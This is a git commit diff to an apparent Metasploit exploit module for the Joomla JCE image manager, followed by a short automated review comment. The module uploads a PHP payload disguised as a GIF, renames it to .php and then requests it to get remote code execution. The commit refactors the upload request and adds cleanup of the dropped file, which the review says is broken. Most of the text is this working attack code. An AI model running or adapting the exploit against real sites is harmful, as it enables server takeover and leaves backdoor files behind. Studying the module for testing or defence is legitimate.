many code adjustments

bug/bundler_fix
heyder 2013-03-22 23:07:08 -03:00
parent b5c65ad51b
commit 5bee1471df
1 changed files with 32 additions and 36 deletions


@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
@ -56,17 +57,16 @@ class Metasploit3 < Msf::Exploit::Remote
def get_version
# check imgmanager version
@uri_base = normalize_uri(datastore['URI'], 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager')
uri = ''
uri << @uri_base
@uri_base = normalize_uri(datastore['URI']) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
uri = @uri_base
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
'version' => '1.1',
'version' => '1.1'
}, 25)
})
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
@ -95,39 +95,28 @@ class Metasploit3 < Msf::Exploit::Remote
@script_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11)
uri = ''
uri << @uri_base
uri = @uri_base
uri << '&method=form'
# POST data
data = "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n"
data << "/\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << "\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"
data << "0\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"\r\n"
data << "Content-Type: image/gif\r\n\r\n"
data << "#{cmd_php}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-name\"\r\n\r\n"
data << "#{@script_name}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
data << "upload\r\n"
data << "--#{boundary}--\r\n\r\n"
post_data = Rex::MIME::Message.new
post_data.bound = boundary
post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"")
post_data.add_part("#{@script_name}", nil, nil, "form-data; name=\"upload-name\"")
post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => 'multipart/form-data; boundary=' + boundary
}, 25)
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i)
@ -143,8 +132,8 @@ class Metasploit3 < Msf::Exploit::Remote
def renamed?
# Rename the file from .gif to .php
uri = ''
uri << @uri_base
# uri = ''
uri = @uri_base
uri << '&version=1576&cid=20'
data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"
@ -162,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'X-Request' => 'JSON'
}
}, 25)
})
if (res and res.code == 200 )
print_good("Renamed #{@script_name}.gif to #{@script_name}.php")
return true
@ -177,9 +166,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Calling payload: #{@script_name}.php")
uri = normalize_uri(datastore['URI'])
uri << directory + @script_name + ".php"
res = send_request_raw({
'uri' => uri
}, 25)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'version' => '1.1'
})
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end
def exploit
@ -188,6 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
if upload_gif == :success
if renamed?
call_payload
register_files_for_cleanup(@script_name)
end
end
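Review bot: The cleanup added in the last hunk will not remove the uploaded file, because `register_files_for_cleanup(@script_name)` registers the bare name while the file on the server is `#{@script_name}.php` after the rename; it should read `register_files_for_cleanup("#{@script_name}.php")`. The new `def on_new_session` takes no argument and never calls `super`, so it appears to shadow the hook that `Msf::Exploit::FileDropper` relies on to delete registered files; either drop the override or write it as `def on_new_session(session)` with a `super` call. As written, an authorized test would leave an executable PHP file behind on the tested server, to be removed by hand. The registration also runs after `call_payload`, so moving it before that call is safer if the session hook can fire first; the body of `exploit` continues outside this hunk, so confirm against the full method.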